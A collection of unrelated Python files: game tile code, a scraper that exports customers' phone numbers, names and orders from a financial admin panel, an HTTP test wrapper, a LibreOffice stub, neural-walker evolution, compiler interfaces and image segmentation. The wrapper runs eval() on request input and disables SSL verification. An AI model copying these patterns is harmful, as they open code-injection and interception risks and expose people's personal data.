self.texture = FLOOR[39]
elif 's' in self.wall_directions:
self.texture = FLOOR[41]
else:
self.texture = FLOOR[40]
elif len(self.wall_directions) == 0:
self.texture = random.choice(FLOOR[-11:-3])
else:
if 'n' in self.wall_directions:
if 'sw' in self.wall_directions:
self.texture = FLOOR[37]
else:
self.texture = FLOOR[36]
elif 'w' in self.wall_directions:
if 'ne' in self.wall_directions:
self.texture = FLOOR[32]
else:
self.texture = FLOOR[30]
elif 's' in self.wall_directions:
if 'nw' in self.wall_directions:
self.texture = FLOOR[35]
else:
self.texture = FLOOR[34]
else:
if 'nw' in self.wall_directions:
self.texture = FLOOR[33]
else:
self.texture = FLOOR[31]
class FloorDecor(arcade.Sprite):
def __init__(self, altar):
super().__init__(scale=1)
if altar:
self.texture = random.choice(ALTAR)
else:
self.texture = random.choice(FLOOR_DECO)
|
#!/usr/bin/env python3
#coding=utf-8
__author__ = 'kk'
import sys
import time
import random
import xlrd, xlwt
import arrow
from requests import Session
import bs4
LOGIN_INFO = {
"username": "chenyk",
"password": "<PASSWORD>"
}
req_headers = {
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Encoding":"gzip, deflate, sdch",
"Accept-Language":"en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4",
"Connection":"keep-alive",
"DNT":"1",
"Host":"zcm.zcmlc.com",
"Referer":"http://zcm.zcmlc.com/zcm/admin/login",
"Upgrade-Insecure-Requests":"1",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
}
URL_LOGIN = "http://zcm.zcmlc.com/zcm/admin/login"
# query account purchase info url
URL_QUERY_ACCOUNT_PURCHASE_INFO_WITH_PAGINATION = "http://zcm.zcmlc.com/zcm/admin/userdetailbuy?Page={page}&account={account}"
URL_QUERY_ACCOUNT_PURCHASE_INFO_WITH_TIME_RANGE = "http://zcm.zcmlc.com/zcm/admin/userdetailbuy?"
URL_QUERY_ORDER_DETAIL = "http://zcm.zcmlc.com/zcm/admin/userdetailtradedetal"
# xls tel column row name
XLS_TEL_COL_ROW_NAME = "手机号"
# operator name filter
XLS_NAME_FILTER = "分配"
XLS_NAME_FILTER_TO_FILTER = "陈益康"
# timeout for every request
REQ_TIMEOUT = 3
# 列名对应的字段
PAGE_ROW = (
"电话",
"订单号",
"姓名",
"购买时间",
"产品名",
"金额",
"状态",
"期限"
)
def is_success(code):
return 200 <= code <= 299
def filter_tels(xls_sheet):
"""
returns tels to query
:param xls_sheet:
:return:
"""
tels = []
operator_column_num = xls_sheet.row_values(0).index(XLS_NAME_FILTER)
tel_col_num = xls_sheet.row_values(0).index(XLS_TEL_COL_ROW_NAME)
for i in range(len(xls_sheet.col(0))):
current_row = xls_sheet.row_values(i)
if current_row[operator_column_num]==XLS_NAME_FILTER_TO_FILTER:
if current_row[tel_col_num]:
tels.append(int(current_row[tel_col_num]))
return tels
def parse_account_info(html):
"""
parse account purchase info from html page
:param html:
:return:
"""
rst = []
soup = bs4.BeautifulSoup(html, "html.parser")
trs = soup.select("#theadFix > tbody > tr")
for tr in trs:
tr_content = []
for td in tr.select("td"):
if td.string and td.string.strip():
tr_content.append(td.string.strip())
elif td.string is None:
tr_content.append(td.string)
rst.append(tr_content)
return rst # 返回的是全部数据
def parse_purchase_info(html):
"""
parse purchase info from an order
:param html:
:return: ("期限", "购买人姓名")
"""
soup = bs4.BeautifulSoup(html, "html.parser")
trs = soup.select(".content_details > table > tbody > tr > td")
return trs[8].text, trs[4].text
def random_pause(delay_level):
"""
make a random pause
"""
try:
delay_level = int(delay_level)
except:
raise ValueError("Not a number.")
if not 1 <= delay_level <= 60:
raise ValueError("bad delay level.")
random_time_to_delay = random.choice(range(delay_level))
time.sleep(random_time_to_delay)
def generate_new_xls_filename():
return sys.argv[1][:-4] + " - 账户导出数据(%s).xls" % arrow.now().format("YYYY-MM-DD HH-mm-ss")
def main():
sess = Session() # 存放此次登录的 cookie
# === read xls ===
speed_level = input("搜索速度等级(1至60,默认为20):")
if not speed_level:
speed_level = "20"
print(speed_level)
print("读xls电话列…")
if len(sys.argv)<=1:
raise Exception("没有输入 xls 文件")
print("文件名: " + sys.argv[1])
wb = xlrd.open_workbook(sys.argv[1])
sheet1 = wb.sheet_by_index(0)
tels = filter_tels(sheet1)
print("搜寻到可用的电话号码数: " + str(len(tels)))
# === logging ===
print("登录账户…")
verify_code = input("输入你当前的验证码:")
while not verify_code:
verify_code = input("输入你当前的验证码:")
LOGIN_INFO.update({"code": verify_code})
resp = sess.post(URL_LOGIN, data=LOGIN_INFO, headers=req_headers)
if not is_success(resp.status_code):
raise Exception("登录失败。(%s)" % resp.status_code)
# === requests ===
print("查询数据…")
print("设置时间起始终止, 输入格式为:年年年年-月月-日日, 然后回车。")
time_begin = input("起始日期: ")
time_end = input("终止日期: ")
if time_begin:
time_begin = arrow.get(time_begin)
time_begin = time_begin.format("YYYY-MM-DD HH:mm:ss")
print("起始时间为: " + time_begin)
if time_end:
time_end = arrow.get(time_end)
time_end = time_end.format("YYYY-MM-DD HH:mm:ss")
print("结束时间为: " + time_end)
# 产生文件名,然后写入 xls 表的首行
file_name = generate_new_xls_filename()
print("输出文件: " + file_name)
doc = xlwt.Workbook()
sheet = doc.add_sheet("sheet1")
# 写入第一行,列名
for n in range(len(PAGE_ROW)):
sheet.write(0,n,PAGE_ROW[n])
doc.save(file_name)
current_line = 1 # 当前 xls 写的行数
for current_tel in tels:
# FIXME only fetch the first page
resp = sess.get(URL_QUERY_ACCOUNT_PURCHASE_INFO_WITH_TIME_RANGE, params={
"purchaseDatebegin":time_begin,
"purchaseDateend":time_end,
"account": current_tel
}, headers=req_headers, timeout=REQ_TIMEOUT)
if not is_success(resp.status_code):
raise Exception("请求数据时返回状态错误, code: {code}, account: {account}".format(
code=resp.status_code,
account=current_tel
))
rst = parse_account_info(resp.content)
for an_order in rst:
order_id = an_order[1]
data_to_write = [current_tel, order_id]
print((current_tel, order_id))
resp = sess.get(URL_QUERY_ORDER_DETAIL, params={"account":current_tel, "id":order_id},
headers=req_headers,
timeout=REQ_TIMEOUT)
new_rst = parse_purchase_info(resp.content)
data_to_write.append(new_rst[1])
data_to_write += [an_order[0], an_order[2], an_order[3], an_order[4]]
data_to_write.append(new_rst[0])
for j in range(len(data_to_write)):
sheet.write(current_line, j, data_to_write[j])
current_line += 1 # 行数增加
doc.save(file_name)
print("写入%s" % current_tel)
random_pause(speed_level)
if __name__=="__main__":
main()
|
import json
from httptesting.library.scripts import (
get_datetime_str,
retry,
get_yaml_field,
parse_args_func
)
from requests.exceptions import (HTTPError, ConnectionError, ConnectTimeout)
from httptesting.globalVar import gl
from httptesting.library.Multipart import MultipartFormData
from httptesting.library.func import FUNC
#########################################################################
#requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#Remove warnings when SSL is turned off dueto requests.
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
###########################################################################
class HttpWebRequest(object):
"""
HTTP post requests or get requests.
usage:
#instance class
http = HttpWebRequest()
res = http.get(**kwargs)
res = http.post(**kwargs)
"""
def __init__(self):
self.config = get_yaml_field(gl.configFile)
self.baseUrl = self.config['BASE_URL']
self.OUT_TMPL = """{0}:\n{1} {2}请求:{3}\n请求:\n{4}\n响应:"""
def header_lower(self, hdict):
"""
Convert HTTP header information to lowercase.
param:
hdict: Head dictionary type.
usage:
ret = header_lower(hdict)
return:
dict Head dictionary type.
"""
tmp = {}
for key, val in hdict.items():
tmp[str(key).lower()] = str(val).lower()
return tmp
@retry(reNum=3)
def get(self, **kwargs):
"""
Get requests.
Param:
**kwargs Request dictionary object.
Usage:
http = HttpWebRequest()
res, headers, cookie, result = http.get(**kwargs)
Return:
res: Request object.
headers: Response headers object.
cookie: Request cookie.
result: Request results result.json() or result.text
"""
try:
params = eval(kwargs['params'])
except (TypeError, ValueError):
params = kwargs['params']
#Whether to adopt , url = base_url + url
if self.config['ENABLE_BASE_URL']:
url = '{}{}'.format(self.baseUrl, str(kwargs['gurl']).strip())
else:
url = str(kwargs['gurl']).strip()
#####################Function############################
#format output.
params = json.dumps(params, sort_keys=True, indent=4)
#Report output template.
tmpl = self.OUT_TMPL.format(
kwargs['desc'],
get_datetime_str(),
kwargs['method'],
url,
params
)
print(tmpl)
try:
res =requests.request(kwargs['method'], url, params=params, headers=kwargs['headers'], verify=False)
headers = res.headers
cookie = res.cookies.get_dict()
if res.status_code ==200:
if 'json' in headers['Content-Type']:
result = res.json()
else:
result = res.text
else:
result = {"errcode": 9001, "errmsg": str(res)}
except (HTTPError, ConnectionError, ConnectTimeout) as ex:
result = {"errcode": 9002, "errmsg": str(ex)}
except Exception as ex:
result = {"errcode": 9003, "errmsg": str(ex) }
#format output.
tmpl_result = json.dumps(result, sort_keys=True, indent=4, ensure_ascii=False)
print(tmpl_result) #The Response results are output to the report.
return res, headers, cookie, result
# Post Request
@retry(reNum=3)
def post(self, **kwargs):
"""post请求"""
#Whether to adopt , url = base_url + url
if self.config['ENABLE_BASE_URL']:
url = '{}{}'.format(self.baseUrl, str(kwargs['gurl']).strip())
else:
url = str(kwargs['gurl']).strip()
#####################Function############################
try:
data = eval(kwargs['data'])
except (TypeError, ValueError):
data = kwargs['data']
header = kwargs['headers']
desc = kwargs['desc']
#format output
tmpl_data = json.dumps(data, sort_keys=True, indent=4, ensure_ascii=False)
#Report output template.
tmpl = self.OUT_TMPL.format(
desc,
get_datetime_str(),
kwargs['method'],
url,
tmpl_data
)
print(tmpl)
header_dict = self.header_lower(kwargs['headers'])
try:
#Convert the data to form-data.
if 'form-data' in header_dict['content-type']:
data = MultipartFormData.to_form_data(data, headers=header)
res = requests.request(
kwargs['method'],
url,
data=data.encode(),
headers=header,
verify= False
)
elif 'application/json' in header_dict['content-type']:
res = requests.request(
kwargs['method'],
url,
json=data,
headers=header,
verify= False
)
elif 'application/x-www-form-urlencoded' in header_dict['content-type']:
res = requests.request(
kwargs['method'],
url,
data=data,
headers=header,
verify= False
)
else:
res = requests.request(
kwargs['method'],
url,
params=data,
headers=header,
verify= False
)
headers = res.headers
cookie = res.cookies.get_dict()
if res.status_code ==200:
if 'json' in headers['Content-Type']:
result = res.json()
else:
result = res.text
else:
result = {"errcode": 9001, "errmsg": str(res)}
except (HTTPError, ConnectionError, ConnectTimeout) as ex:
result = {"errcode": 9002, "errmsg": str(ex)}
# format output.
tmpl_result = json.dumps(result, sort_keys=True, indent=4, ensure_ascii=False)
#The Response results are output to the report.
print(tmpl_result)
return res, headers, cookie, result
|
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Service Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.text
import typing
from abc import abstractproperty
from .base_frame import BaseFrame as BaseFrame_8f020a33
if typing.TYPE_CHECKING:
from ..awt.size import Size as Size_576707ef
from ..container.x_index_container import XIndexContainer as XIndexContainer_1c040ebe
from ..drawing.color_mode import ColorMode as ColorMode_b13e0b78
from ..drawing.point_sequence_sequence import PointSequenceSequence as PointSequenceSequence_5c591070
from ..graphic.x_graphic import XGraphic as XGraphic_a4da0afc
from .graphic_crop import GraphicCrop as GraphicCrop_a58e0b1f
class TextGraphicObject(BaseFrame_8f020a33):
"""
Service Class
specifies a graphic which can be embedded in Text.
See Also:
`API TextGraphicObject <https://api.libreoffice.org/docs/idl/ref/servicecom_1_1sun_1_1star_1_1text_1_1TextGraphicObject.html>`_
"""
__ooo_ns__: str = 'com.sun.star.text'
__ooo_full_ns__: str = 'com.sun.star.text.TextGraphicObject'
__ooo_type_name__: str = 'service'
@abstractproperty
def ActualSize(self) -> 'Size_576707ef':
"""
contains the original size of the bitmap in the graphic object.
"""
@abstractproperty
def AdjustBlue(self) -> int:
"""
changes the display of the blue color channel.
It contains percentage values between -100 and +100.
"""
@abstractproperty
def AdjustContrast(self) -> int:
"""
changes the display of contrast.
It contains percentage values between -100 and +100.
"""
@abstractproperty
def AdjustGreen(self) -> int:
"""
changes the display of the green color channel.
It contains percentage values between -100 and +100.
"""
@abstractproperty
def AdjustLuminance(self) -> int:
"""
changes the display of the luminance.
It contains percentage values between -100 and +100.
"""
@abstractproperty
def AdjustRed(self) -> int:
"""
changes the display of the red color channel.
It contains percentage values between -100 and +100.
"""
@abstractproperty
def ContentProtected(self) -> bool:
"""
determines if the content is protected against changes from the user interface.
"""
@abstractproperty
def ContourOutside(self) -> bool:
"""
the text flows only around the contour of the object.
"""
@abstractproperty
def ContourPolyPolygon(self) -> 'PointSequenceSequence_5c591070':
"""
contains the contour of the object as PolyPolygon.
"""
@abstractproperty
def Gamma(self) -> float:
"""
determines the gamma value of the graphic.
"""
@abstractproperty
def Graphic(self) -> 'XGraphic_a4da0afc':
"""
contains the background graphic of the object.
"""
@abstractproperty
def GraphicColorMode(self) -> 'ColorMode_b13e0b78':
"""
contains the ColorMode as com.sun.star.drawing.ColorMode.
"""
@abstractproperty
def GraphicCrop(self) -> 'GraphicCrop_a58e0b1f':
"""
contains the cropping of the object.
"""
@abstractproperty
def GraphicFilter(self) -> str:
"""
contains the name of the filter of the background graphic of the object.
"""
@abstractproperty
def GraphicIsInverted(self) -> bool:
"""
determines if the graphic is display in inverted colors.
It contains percentage values between -100 and +100.
"""
@abstractproperty
def GraphicURL(self) -> str:
"""
contains the URL of the background graphic of the object
Note the new behaviour since it was deprecated: This property can only be set and only external URLs are supported (no more vnd.sun.star.GraphicObject scheme). When a URL is set, then it will load the image and set the Graphic property.
"""
@abstractproperty
def HoriMirroredOnEvenPages(self) -> bool:
"""
determines if the object is horizontally mirrored on even pages.
"""
@abstractproperty
def HoriMirroredOnOddPages(self) -> bool:
"""
determines if the object is horizontally mirrored on odd pages.
"""
@abstractproperty
def ImageMap(self) -> 'XIndexContainer_1c040ebe':
"""
returns the client-side image map if one is assigned to the object.
"""
@abstractproperty
def SurroundContour(self) -> bool:
"""
determines if the text wraps around the contour of the object.
"""
@abstractproperty
def Transparency(self) -> int:
"""
contains percentage values between -100 and +100.
"""
@abstractproperty
def VertMirrored(self) -> bool:
"""
determines if the object is mirrored vertically.
"""
__all__ = ['TextGraphicObject']
|
import ea
import leggedwalker
import numpy as np
import math
from jason.rl_ctrnn import RL_CTRNN
from jason.ctrnn import CTRNN
from walking_task2 import WalkingTask
import warnings
from scipy.ndimage.interpolation import shift
import matplotlib.pyplot as plt
from matplotlib import cm
import os
import time
from matplotlib.colors import ListedColormap
import concurrent.futures #multiprocessing
np.seterr(all='warn')
warnings.simplefilter("always")
# Nervous System Parameters
N = 2 # Number of neurons in the nervous system
WR = 16 # Weight range - maps from [-1, 1] to: [-16,16]
BR = 16 # Bias range - maps from [-1, 1] to: [-16,16]
TR = 5.0 # Time range - maps from [-1, 1] to: [-5, 5]
TA = 6.0 # Time add - maps from [-5, 5] to: [1,11]
# Task Parameters
stepsize = 0.1
#time = np.arange(0.0, duration, stepsize)
x = cm.get_cmap('tab10')
colors = x.colors
duration = 2000
def fitnessFunction(genotype):
# Create the agent's body
legged = leggedwalker.LeggedAgent()
# Create the nervous system
ns = CTRNN(N)
# Set the parameters of the nervous system according to the genotype-phenotype map
weights = genotype[0:N*N]
ns.setWeights(weights.reshape((N, N)))
ns.setBiases(genotype[N*N:N*N+N])
ns.setTimeConstants(genotype[N*N+N:])
# Initialize the state of the nervous system to some value
ns.initializeState(np.zeros(N))
#learner = RL_CTRNN(ns)
# Loop through simulated time, use Euler Method to step the nervous system and body
time = np.arange(0.0, duration, stepsize)
for i, t in enumerate(time):
ns.setInputs(np.array([legged.anglefeedback()]*N)) # Set neuron input to angle feedback based on current body state
ns.step(stepsize) # Update the nervous system based on inputs
legged.step1(stepsize, ns.outputs) # Update the body based on nervous system activity
# fitness_arr[i] = body.cx # track position of body
#update neurons based on speed of movement (cx(t)-cx(t-1))/dt
# Calculate the fitness based on distance covered over the duration of time
# fit = legged.cx/duration
return legged.cx/duration
popsize = 25
genesize = N*N + 2*N
recombProb = 0.5
mutatProb = 0.01
demesize = 2
generations = 30
init_flux = 0.1
def learningFunction(genotype):
weights = genotype[0:N*N]
learner = WalkingTask(size=2,
duration=duration,
stepsize=0.1,
reward_func=None,
performance_func=None,
running_window_mode=True,
running_window_size=4000,
performance_update_rate=0.05,
init_flux_amp= init_flux,
max_flux_amp=40,
flux_period_min=300,
flux_period_max=400,
flux_conv_rate=0.004, learn_rate=0.008,
bias_init_flux_amp=init_flux,
bias_max_flux_amp=40,
bias_flux_period_min=300,
bias_flux_period_max=400,
bias_flux_conv_rate=0.004,
)
learner.setWeights(weights.reshape((N, N)))
learner.setBiases(genotype[N*N:N*N+N])
learner.setTimeConstants(genotype[N*N+N:])
learner.initializeState(np.zeros(N))
body = leggedwalker.LeggedAgent()
learner.simulate(body, learning_start=4000, trackpercent=1.00)
return body.cx/duration
#create dictionary of 10 parallel processes
#each process is alternating between evo and evo+learn
#num_process = 4
#function = {'evo': fitnessFunction, 'learn':learningFunction}
#function_keys = list(function.keys())
#genetic = {function_keys[i%2]+f'{i//2}':ea.Microbial(function[function_keys[i%2]], popsize, genesize, recombProb, mutatProb, demesize, generations) for i in range(num_process)}
#with concurrent.futures.ProcessPoolExecutor() as executor:
# s = [executor.submit(genetic[function_keys[i%2]+f"{i//2}"].run) for i in range(num_process)]
# for p in s:
# print('done')
#style = ['-', ':']
#
#results = dict()
#for i in range(2):
# results[function_keys[i%2]+'best'] = []
# results[function_keys[i%2]+'avg'] = []
#
#
#for i in range(num_process):
# plt.plot(genetic[function_keys[i%2]+f"{i//2}"].bestHistory, label=function_keys[i%2], color='r', ls = style[i%2])
# results[function_keys[i%2]+'best'].append(genetic[function_keys[i%2]+f"{i//2}"].bestHistory)
# plt.plot(genetic[function_keys[i%2]+f"{i//2}"].avgHistory, label=function_keys[i%2], color='k', ls = style[i%2])
# results[function_keys[i%2]+'avg'].append(genetic[function_keys[i%2]+f"{i//2}"].avgHistory)
#plt.plot(np.mean(results['evobest']), label='avgEvoBest', color='c', ls=':')
#plt.plot(np.mean(results['evoavg']), label='avgEvoAvg', color='y', ls=':')
#plt.plot(np.mean(results['learnbest']), label='avgLearnBest', color='c', ls='-')
#plt.plot(np.mean(results['learnavg']), label='avgLearnAvg', color='y', ls='-')
#plt.xlabel("Generations")
#plt.ylabel("Fitness")
#plt.title(f"Microbial: Best and average fitness\nBest evo+learn \ninit flux:{init_flux}\nT:{duration}s")
#plt.legend()
#plt.show()
#
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import os
import shutil # which
from typing import Dict, List, Tuple
import warnings
from dace import dtypes, memlet as mm, data as dt
from dace.sdfg import nodes, SDFG, SDFGState, ScopeSubgraphView, graph as gr
from dace.sdfg.utils import dfs_topological_sort
from dace.codegen.instrumentation.provider import InstrumentationProvider
from dace.registry import extensible_enum, make_registry
from dace.codegen.prettycode import CodeIOStream
from dace.codegen.codeobject import CodeObject
@make_registry
class TargetCodeGenerator(object):
""" Interface dictating functions that generate code for:
* Array allocation/deallocation/initialization/copying
* Scope (map, consume) code generation
"""
def get_generated_codeobjects(self) -> List[CodeObject]:
""" Returns a list of generated `CodeObject` classes corresponding
to files with generated code. If an empty list is returned
(default) then this code generator does not create new files.
@see: CodeObject
"""
return []
def on_target_used(self) -> None:
"""
Called before generating frame code (headers / footers) on this target
if it was dispatched for any reason. Can be used to set up state struct
fields.
"""
pass
@property
def has_initializer(self) -> bool:
""" Returns True if the target generates a `__dace_init_<TARGET>`
function that should be called on initialization. """
return False
@property
def has_finalizer(self) -> bool:
""" Returns True if the target generates a `__dace_exit_<TARGET>`
function that should be called on finalization. """
return False
def generate_state(self, sdfg: SDFG, state: SDFGState,
function_stream: CodeIOStream,
callsite_stream: CodeIOStream) -> None:
""" Generates code for an SDFG state, outputting it to the given
code streams.
:param sdfg: The SDFG to generate code from.
:param state: The SDFGState to generate code from.
:param function_stream: A `CodeIOStream` object that will be
generated outside the calling code, for
use when generating global functions.
:param callsite_stream: A `CodeIOStream` object that points
to the current location (call-site)
in the code.
"""
pass
def generate_scope(self, sdfg: SDFG, dfg_scope: ScopeSubgraphView,
state_id: int, function_stream: CodeIOStream,
callsite_stream: CodeIOStream) -> None:
""" Generates code for an SDFG state scope (from a scope-entry node
to its corresponding scope-exit node), outputting it to the given
code streams.
:param sdfg: The SDFG to generate code from.
:param dfg_scope: The `ScopeSubgraphView` to generate code from.
:param state_id: The node ID of the state in the given SDFG.
:param function_stream: A `CodeIOStream` object that will be
generated outside the calling code, for
use when generating global functions.
:param callsite_stream: A `CodeIOStream` object that points
to the current location (call-site)
in the code.
"""
raise NotImplementedError('Abstract class')
def generate_node(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
node: nodes.Node, function_stream: CodeIOStream,
callsite_stream: CodeIOStream) -> None:
""" Generates code for a single node, outputting it to the given
code streams.
:param sdfg: The SDFG to generate code from.
:param dfg: The SDFG state to generate code from.
:param state_id: The node ID of the state in the given SDFG.
:param node: The node to generate code from.
:param function_stream: A `CodeIOStream` object that will be
generated outside the calling code, for
use when generating global functions.
:param callsite_stream: A `CodeIOStream` object that points
to the current location (call-site)
in the code.
"""
raise NotImplementedError('Abstract class')
def declare_array(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
node: nodes.Node, nodedesc: dt.Data,
global_stream: CodeIOStream,
declaration_stream: CodeIOStream) -> None:
""" Generates code for declaring an array without allocating it,
outputting to the given code streams.
:param sdfg: The SDFG to generate code from.
:param dfg: The SDFG state to generate code from.
:param state_id: The node ID of the state in the given SDFG.
:param node: The data node to generate allocation for.
:param nodedesc: The data descriptor to allocate.
:param global_stream: A `CodeIOStream` object that will be
generated outside the calling code, for
use when generating global functions.
:param declaration_stream: A `CodeIOStream` object that points
to the point of array declaration.
"""
raise NotImplementedError('Abstract class')
def allocate_array(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
node: nodes.Node, nodedesc: dt.Data,
global_stream: CodeIOStream,
declaration_stream: CodeIOStream,
allocation_stream: CodeIOStream) -> None:
""" Generates code for allocating an array, outputting to the given
code streams.
:param sdfg: The SDFG to generate code from.
:param dfg: The SDFG state to generate code from.
:param state_id: The node ID of the state in the given SDFG.
:param node: The data node to generate allocation for.
:param nodedesc: The data descriptor to allocate.
:param global_stream: A `CodeIOStream` object that will be
generated outside the calling code, for
use when generating global functions.
:param declaration_stream: A `CodeIOStream` object that points
to the point of array declaration.
:param allocation_stream: A `CodeIOStream` object that points
to the call-site of array allocation.
"""
raise NotImplementedError('Abstract class')
def deallocate_array(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
node: nodes.Node, nodedesc: dt.Data,
function_stream: CodeIOStream,
callsite_stream: CodeIOStream) -> None:
""" Generates code for deallocating an array, outputting to the given
code streams.
:param sdfg: The SDFG to generate code from.
:param dfg: The SDFG state to generate code from.
:param state_id: The node ID of the state in the given SDFG.
:param node: The data node to generate deallocation for.
:param nodedesc: The data descriptor to deallocate.
:param function_stream: A `CodeIOStream` object that will be
generated outside the calling code, for
use when generating global functions.
:param callsite_stream: A `CodeIOStream` object that points
to the current location (call-site)
in the code.
"""
raise NotImplementedError('Abstract class')
def copy_memory(self, sdfg: SDFG, dfg: SDFGState, state_id: int,
src_node: nodes.Node, dst_node: nodes.Node,
edge: gr.MultiConnectorEdge[mm.Memlet],
function_stream: CodeIOStream,
callsite_stream: CodeIOStream) -> None:
""" Generates code for copying memory, either from a data access
node (array/stream) to another, a code node (tasklet/nested
SDFG) to another, or a combination of the two.
:param sdfg: The SDFG to generate code from.
:param dfg: The SDFG state to generate code from.
:param state_id: The node ID of the state in the given SDFG.
:param src_node: The source node to generate copy code for.
:param dst_node: The destination node to generate copy code for.
:param edge: The edge representing the copy (in the innermost
scope, adjacent to either the source or destination
node).
:param function_stream: A `CodeIOStream` object that will be
generated outside the calling code, for
use when generating global functions.
:param callsite_stream: A `CodeIOStream` object that points
to the current location (call-site)
in the code.
"""
raise NotImplementedError('Abstract class')
class IllegalCopy(TargetCodeGenerator):
""" A code generator that is triggered when invalid copies are specified
by the SDFG. Only raises an exception on failure. """
def copy_memory(self, sdfg, dfg, state_id, src_node, dst_node, edge,
function_stream, callsite_stream):
raise TypeError('Illegal copy! (from ' + str(src_node) + ' to ' +
str(dst_node) + ')')
def make_absolute(path: str) -> str:
"""
Finds an executable and returns an absolute path out of it. Used when
finding compiler executables.
:param path: Executable name, relative path, or absolute path.
:return: Absolute path pointing to the same file as ``path``.
"""
if os.path.isfile(path):
if os.path.isabs(path):
# Path is absolute, we're happy
return path
else:
# Path is relative: make it absolute
return os.path.abspath(path)
else:
# This is not a path, probably just an executable name, such
# as "g++". Try to find it on the PATH
executable = shutil.which(path)
if not executable:
executable = path
warnings.warn("Could not find executable \"{}\"".format(path))
return executable.replace('\\', '/')
|
import os
import argparse
import numpy as np
from skimage.morphology import disk
from jicbioimage.core.io import AutoName, AutoWrite
from jicbioimage.core.image import Image
from jicbioimage.core.transform import transformation
from jicbioimage.transform import (
threshold_otsu,
remove_small_objects,
erode_binary,
)
from jicbioimage.segment import connected_components, watershed_with_seeds
from dtoolcore import DataSet
from utils import (
red_channel,
green_channel,
difference,
fill_small_holes,
)
from segment import filter_sides, filter_touching_border
from jicgeometry import Point2D
def find_approx_plot_locs(dataset, identifier):
corner_coords = dataset.access_overlays()["coords"][identifier]
def coords_to_point2d(coords):
x = float(coords['x'])
y = float(coords['y'])
return Point2D(x, y)
top_left = coords_to_point2d(corner_coords['topLeft'])
bottom_left = coords_to_point2d(corner_coords['bottomLeft'])
top_right = coords_to_point2d(corner_coords['topRight'])
vdiff = bottom_left - top_left
hdiff = top_right - top_left
plot_locs = []
for hmult in np.linspace(0, 1, 6):
for vmult in np.linspace(0, 1, 5):
plot_locs.append(top_left + hdiff * hmult + vdiff * vmult)
return plot_locs
def normalise_array(array):
a_min = array.min()
a_max = array.max()
return (array - a_min) / (a_max - a_min)
def force_to_uint8(array):
normalised = normalise_array(array)
scaled = normalised * 255
return scaled.astype(np.uint8)
@transformation
def sklocal(image):
from skimage.filters.rank import entropy
le = entropy(image, disk(5))
return force_to_uint8(le)
@transformation
def skmean(image):
from skimage.filters.rank import mean
mean_filtered = mean(image, disk(30))
print mean_filtered.min(), mean_filtered.max()
return mean_filtered
@transformation
def distance_transform(image):
from skimage.morphology import medial_axis
_, dist = medial_axis(image, return_distance=True)
return dist
@transformation
def segment(image, seeds=None):
"""Return field plots."""
green = green_channel(image)
image = sklocal(green)
image = skmean(image)
mask = threshold_otsu(image)
mask = remove_small_objects(mask, min_size=1000)
mask = fill_small_holes(mask, min_size=100)
dist = distance_transform(mask)
if seeds is None:
seeds = erode_binary(mask, selem=disk(10))
seeds = remove_small_objects(seeds, min_size=100)
seeds = connected_components(seeds, background=0)
return watershed_with_seeds(image, seeds=seeds, mask=mask)
@transformation
def filter_by_size(plots):
"""Remove plots the size of which lies outside particular min and max plot
sizes."""
# params = Parameters()
identifiers = plots.identifiers
# TODO - set relative to median?
min_plot_size = 20000
max_plot_size = 120000
for identifier in identifiers:
region = plots.region_by_identifier(identifier)
size = region.area
if (size < min_plot_size) or (size > max_plot_size):
plots.remove_region(identifier)
return plots
def generate_seed_image(image, dataset, identifier):
seeds_as_list = find_approx_plot_locs(dataset, identifier)
xdim, ydim, _ = image.shape
seeds = np.zeros((xdim, ydim), dtype=np.uint8)
for n, seed in enumerate(seeds_as_list):
xfrac, yfrac = seed
x = int(yfrac * xdim)
y = int(xfrac * ydim)
seeds[x, y] = n
return seeds
def generate_output_filename(dataset, identifier, output_path, suffix=""):
output_basename = os.path.basename(
dataset.abspath_from_identifier(identifier)
)
name, ext = os.path.splitext(output_basename)
output_filename = name + suffix + ext
full_output_filename = os.path.join(output_path, output_filename)
return full_output_filename
def save_segmented_image_as_rgb(segmented_image, filename):
segmentation_as_rgb = segmented_image.unique_color_image
with open(filename, 'wb') as f:
f.write(segmentation_as_rgb.png())
def process_single_identifier(dataset, identifier, output_path):
print("Processing {}".format(identifier))
image = Image.from_file(dataset.abspath_from_identifier(identifier))
seeds = generate_seed_image(image, dataset, identifier)
segmentation = segment(image, seeds)
segmentation = filter_sides(segmentation)
segmentation = filter_touching_border(segmentation)
output_filename = generate_output_filename(
dataset,
identifier,
output_path,
'-segmented'
)
save_segmented_image_as_rgb(segmentation, output_filename)
false_colour_filename = generate_output_filename(
dataset,
identifier,
output_path,
'-false_colour'
)
with open(false_colour_filename, 'wb') as fh:
fh.write(segmentation.png())
def identifiers_where_overlay_is_true(dataset, overlay_name):
overlays = dataset.access_overlays()
selected = [identifier
for identifier in dataset.identifiers
if overlays[overlay_name][identifier]]
return selected
def identifiers_where_overlay_matches_value(dataset, overlay_name, value):
overlays = dataset.access_overlays()
selected = [identifier
for identifier in dataset.identifiers
if overlays[overlay_name][identifier] == value]
return selected
def explore_dataset(dataset, output_path, n=1):
ids_of_interest = identifiers_where_overlay_matches_value(
dataset, 'ordering', 1
)
print(ids_of_interest)
for identifier in ids_of_interest[:n]:
process_single_identifier(dataset, identifier, output_path)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('dataset_path', help='Path to dataset')
parser.add_argument('output_path', help='Output directory')
